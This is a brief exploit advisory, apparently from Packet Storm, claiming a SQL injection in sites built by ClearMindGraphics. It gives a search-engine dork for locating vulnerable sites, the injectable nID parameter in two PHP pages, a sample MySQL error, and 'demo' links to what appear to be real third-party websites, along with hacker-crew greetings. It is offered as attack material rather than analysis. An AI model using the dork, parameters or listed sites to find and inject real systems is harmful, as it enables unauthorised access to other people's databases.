ClearMindGraphics suffers from a remote SQL injection vulnerability.
6834bd5a68215d01306f1da78ec02b1fe16e3f9e7dd81863302ff2793be0455d _________________________________________________________
#
# Exploit Title: ClearMindGraphics SQL Injection Vulnerability
# -[Google Dork]-: "Site by: ClearMindGraphics"
# Date: 2011-18-09
# Author: nGa Sa Lu [ GaNgst3r ]
# Service Link: http://www.clearmindgraphics.com/
# Tested on: Vista
# Platform : php
# ________________________________________________________
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>> Google Dork : "Site by: ClearMindGraphics" >>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
------------------------------------------------------------------------------------------------
http://www.localhost.com/news.php?nID=[SQL]
http://www.localhost.com/events_news.php?nID=[SQL]
------------------------------------------------------------------------------------------------
# SQL Error Statement
------------------------
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
# Demo
---------
http://www.temscoair.com/news.php?nID=8
http://www.greenantelope.net/events_news.php?nID=10
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>> Greetz to all M1rT crew, h4ckall[dot]net, 4lbora4q[dot]com bros >>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed